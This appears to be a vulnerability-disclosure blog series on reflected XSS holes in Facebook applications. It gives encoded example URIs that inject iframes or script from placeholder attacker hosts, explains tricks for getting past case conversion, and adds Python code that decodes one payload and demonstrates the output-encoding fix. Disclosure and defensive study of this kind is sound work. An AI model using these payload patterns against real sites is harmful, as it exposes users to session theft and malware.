FAXX Hack: Lucky Strike Lanes

Facebook Verified Application

Current Monthly Active Users: 83,243

Current Rank on Application Leaderboard: 539

Application Developer: Large Animal Games

Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/luckystrikelanes/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E


FAXX Hack: Bumper Stars

Facebook Verified Application

Current Monthly Active Users: 55,431

Current Rank on Application Leaderboard: 659

Application Developer: Large Animal Games

Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/bumperstars/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E

Notes: You’ll notice the example URI only inserts an iframe, rather than attempting the sort of double-injection of previous examples. Bumper Stars, and two other Large Animal Games applications that will be posted soon, use Facebook’s server whitelist feature for API requests. This means that trying to use injected JavaScript to make API calls will fail, as they originate from the user’s computer and not LAG’s servers. One could still have used the XSS hole to launch a malware attack, but using the whitelist prevents stealing profile information or launching a viral attack via notifications and feed stories.

Bumper Stars was the first application I’ve encountered that made use of the server whitelist feature, and I commend LAG for that step. But while the feature can prevent many of the attacks I’ve outlined, it is not practical for every application. Many other developers make use of the JavaScript API for legitimate calls, and these would fail if the developer enabled a server whitelist.


FAXX Hack: kaChing

Facebook Verified Application

Current Monthly Active Users: 28,778

Current Rank on Application Leaderboard: 963

Application Developer: kaChing Group, Inc.

Responsiveness: I received an e-mail from kaChing saying the hole was patched about six hours after notifying them.

Vulnerability Status: Patched

Capable of Clickjacking Install: Uncertain

Example URI: http://apps.facebook.com/kaching/portfolio/trade?symbol=%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fwww.kaching.com%2F%26%23x66%3B%26%23x62%3B%2F%26%23x70%3B%26%23x6F%3B%26%23x72%3B%26%23x74%3B%26%23x66%3B%26%23x6F%3B%26%23x6C%3B%26%23x69%3B%26%23x6F%3B%2F%26%23x74%3B%26%23x72%3B%26%23x61%3B%26%23x64%3B%26%23x65%3B%3F%26%23x73%3B%26%23x79%3B%26%23x6D%3B%26%23x62%3B%26%23x6F%3B%26%23x6C%3B%3D%253Ciframe%2Bsrc%253D%2522http%253A%252F%252Ffbl.li%252Fr%252F%2522%253E%22%3E

Notes: This hole was very straightforward, but fully exploiting it required one more trick. Since the injected parameter was a stock symbol, the resulting page would automatically capitalize the input when displaying an error message. That meant that the injected URI became uppercase when it needed to be lowercase. To combat that issue, I converted the text parts of the URI to hex encodings, then had to encode those values for a URI. All these steps resulted in the rather lengthy URI above, which did preserve capitalization.

P.S. Those should be lowercase x’s in the example URI.
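To make the encoding layers in that URI concrete, here is an added example in Python (it is not code from the post, kaChing or Facebook). It peels the nested percent-encoding of the `symbol` parameter one hop at a time, models the vulnerable page's behaviour as the post describes it (decode once, upper-case, echo without HTML-escaping), and then models the FBML/HTML parser decoding the numeric character references in the echoed `src` attribute. The point for a defender: `&#X66;` and `&#x66;` both decode to `f`, so case-folding a reflected value does nothing to neutralise it; only output encoding does. The parameter value is copied from the post (with lowercase x's); `fbl.li/r/` is the author's placeholder host, and the attribute-extraction helper is a deliberately simple stand-in for a real parser.

```python
import html
from urllib.parse import unquote_plus

# Value of the `symbol` parameter from the post's kaChing example URI, written with
# the lowercase x's the P.S. asks for. "fbl.li/r/" is the author's placeholder host.
KACHING_SYMBOL = (
    "%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fwww.kaching.com%2F"
    "%26%23x66%3B%26%23x62%3B%2F"                                      # fb/
    "%26%23x70%3B%26%23x6F%3B%26%23x72%3B%26%23x74%3B%26%23x66%3B"
    "%26%23x6F%3B%26%23x6C%3B%26%23x69%3B%26%23x6F%3B%2F"              # portfolio/
    "%26%23x74%3B%26%23x72%3B%26%23x61%3B%26%23x64%3B%26%23x65%3B%3F"  # trade?
    "%26%23x73%3B%26%23x79%3B%26%23x6D%3B%26%23x62%3B%26%23x6F%3B"
    "%26%23x6C%3B%3D"                                                  # symbol=
    "%253Ciframe%2Bsrc%253D%2522http%253A%252F%252Ffbl.li%252Fr%252F%2522%253E"
    "%22%3E"
)


def peel_percent_encoding(value: str) -> list[str]:
    """Apply URL decoding repeatedly until it stops changing the string.

    Returns every layer, raw value first. A nested URI like the one above carries
    one extra %-encoding per hop, so each layer is what one hop's server sees.
    """
    layers = [value]
    while True:
        decoded = unquote_plus(layers[-1])
        if decoded == layers[-1]:
            return layers
        layers.append(decoded)


def reflect_uppercased(symbol_param: str) -> str:
    """Model the vulnerable error page as the post describes it: decode the query
    parameter once and echo it back upper-cased, with no HTML escaping."""
    return unquote_plus(symbol_param).upper()


def iframe_src_after_entity_decode(markup: str) -> str:
    """Model the FBML/HTML parser reading the src attribute of the echoed tag
    (simplified stand-in, not a real parser): numeric character references are
    decoded, and &#X66; is 'f' just like &#x66;, so the hex-encoded path comes
    back in its original lower case despite the upper-casing."""
    start = markup.index('SRC="') + len('SRC="')
    end = markup.index('"', start)
    return html.unescape(markup[start:end])


if __name__ == "__main__":
    for depth, layer in enumerate(peel_percent_encoding(KACHING_SYMBOL)):
        print(f"layer {depth}: {layer}")
    echoed = reflect_uppercased(KACHING_SYMBOL)
    print("echoed markup:", echoed)
    print("src as parsed:", iframe_src_after_entity_decode(echoed))
```

Running it shows three layers (the outer FBML tag, the kaChing URL with its entity-encoded path, and the innermost iframe), an echoed tag that is still a live `<FB:IFRAME ...>` because tag names are case-insensitive, and a `src` whose `fb/portfolio/trade?symbol=` path survives in lower case. Any transformation that is not proper HTML/attribute encoding of the reflected value should be treated as no protection at all.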


FAXX Hack: Birthday Cards

Current Monthly Active Users: 9,067,238

Current Rank on Application Leaderboard: 18

Application Developer: RockYou

Responsiveness: Once again, RockYou never sent a message but did patch the hole.

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/rybirthday/zoo/shop.php?category=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http://fb.rockyou.com/facebook_apps/rybirthdays/zoo/shop.php?category=%2522%252F%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%22%3E


FAXX Hack: Bumper Sticker

Double hacks tomorrow to make up for Monday’s break.

Facebook Verified Application

Current Monthly Active Users: 5,422,286

Current Rank on Application Leaderboard: 29

Application Developer: LinkedIn

Responsiveness: I sent this hole to Facebook on Sep. 1, then followed up with an e-mail to LinkedIn over the weekend.

Vulnerability Status: Unpatched

Capable of Clickjacking Install: No

Example URI: After further consideration, I’ve changed my mind about the whole 24-hour thing. I’ll post details once the hole is patched.


Quick Update on FAXX Hacks

I did not post a FAXX hack on Monday for two reasons. First, I had forgotten to factor in the long weekend (Monday is Labor Day in the US) when notifying developers, hence posting would not have allowed an actual business day to pass before releasing details. Second, I spent most all of Saturday and again Monday in bed. I haven’t been terribly sick, but I’ve been dealing with tiredness and weakness.

None of this means I’ve hit a point where I lack for material. To make up for Monday’s omission, I will be posting two hacks one day this week. I may take another break on Tuesday to ensure developers have time to patch holes, but if that happens, I’ll simply post two hacks on a second day as well. The “month of Facebook bugs” is far from over.


FAXX Hack: RockYou Live

Facebook Verified Application

Current Monthly Active Users: 9,767,698

Current Rank on Application Leaderboard: 17

Application Developer: RockYou!

Responsiveness: After announcing this series, a Facebook security contact got in touch and requested more information. I complied, and apparently RockYou! issued a patch after receiving word from Facebook, as I’ve not heard from them but can no longer replicate the issue.

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/superwall/stickers_mainpage.php?type=cards&_ryfbe=fb-wall-header-stickers&msg=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffb.rockyou.com%2Ffacebook_apps%2Frywall%2Fstickers_mainpage.php%3Ftype%3Dcards%26_ryfbe%3Dfb-wall-header-stickers%26msg%3D%2522%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%2522%253E%253C%252Fscript%253E

Notes: When I first figured out how to take advantage of XSS holes in FBML applications, I tried inserting a script element, as shown here. This worked with RockYou Live, but later applications included scripts prior to the insertion point. When taken out of the context of apps.facebook.com, these scripts would generate errors, and the inserted script would fail to execute. I then resorted to inserting another iframe which loaded a special HTML file that included the necessary script payload. Previous FAXX examples use this more reliable trick.

By the way, RockYou Live was also among the worst performers in my privacy policy survey a few weeks back.


FAXX Hack: Farm Town

Current Monthly Active Users: 18,638,429

Current Rank on Application Leaderboard: 7

Application Developer: Slashkey

Responsiveness: Slashkey reported that they went through their codebase and encoded all URI parameters after receiving word of the problem.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/farmtown/select_friends/?type=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%253A%252F%252Fl1.slashkey.com%252Ffacebook%252Ffarm%252Fselect_friends%252F%253Ftype%253D%252522%25252F%25253E%25253Ciframe%252Bsrc%25253D%252522http%25253A%25252F%25252FEVILURI%25252F%252522%25253E%2526select%253Dfarm%22%2F%3E&select=farm
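The fix Slashkey described, encoding every URI parameter before it is echoed, is the one that closes this whole class of hole. As an added example (not Slashkey's or Facebook's code), here is a reflected-parameter handler in Python before and after that fix, run against the `type` and `select` parameters of the Farm Town URI above. The template is a hypothetical stand-in, since the post does not show the app's real markup; `EVILURI` is the author's placeholder. A small `HTMLParser` subclass lists the elements a parser would actually create from each rendering, which is the check worth keeping in a test suite: the raw rendering yields an extra `fb:iframe` element, the encoded one yields only the two inputs and still carries the parameter value intact.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The post's Farm Town example URI (EVILURI is the author's placeholder).
FARMTOWN_URI = (
    "http://apps.facebook.com/farmtown/select_friends/?type=%22%2F%3E%3Cfb%3Aiframe+src%3D"
    "%22http%253A%252F%252Fl1.slashkey.com%252Ffacebook%252Ffarm%252Fselect_friends%252F"
    "%253Ftype%253D%252522%25252F%25253E%25253Ciframe%252Bsrc%25253D%252522http%25253A"
    "%25252F%25252FEVILURI%25252F%252522%25253E%2526select%253Dfarm%22%2F%3E&select=farm"
)

# Hypothetical template standing in for the app's real markup (not shown in the
# post): both query parameters are echoed into attribute values.
TEMPLATE = (
    '<input type="hidden" name="type" value="{type}" />'
    '<input type="hidden" name="select" value="{select}" />'
)


def query_params(uri: str) -> dict[str, str]:
    """The parameters as the application sees them: URL-decoded exactly once."""
    parsed = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    return {name: values[0] for name, values in parsed.items()}


def render_vulnerable(params: dict[str, str]) -> str:
    """Before the fix: raw values dropped straight into the markup. A value that
    begins with "/> closes the input, and whatever follows is parsed as new tags."""
    return TEMPLATE.format(type=params.get("type", ""), select=params.get("select", ""))


def render_hardened(params: dict[str, str]) -> str:
    """After the fix the post describes: every parameter HTML-encoded before it is
    echoed. quote=True also encodes " and ', so a value cannot leave its attribute."""
    safe = {name: html.escape(value, quote=True) for name, value in params.items()}
    return TEMPLATE.format(type=safe.get("type", ""), select=safe.get("select", ""))


class TagCollector(HTMLParser):
    """Record every element a parser would create from the markup, with attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    def handle_startendtag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def elements_in(markup: str) -> list[tuple[str, dict]]:
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def tag_names(markup: str) -> list[str]:
    return [tag for tag, _ in elements_in(markup)]


if __name__ == "__main__":
    params = query_params(FARMTOWN_URI)
    print("vulnerable:", tag_names(render_vulnerable(params)))
    print("hardened  :", tag_names(render_hardened(params)))
```

The hardened renderer encodes the value at the point of output rather than trying to strip or rewrite it on input, which is why it survives the double- and triple-encoded payloads in these posts: whatever the value decodes to, it reaches the page as attribute text and never as markup.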

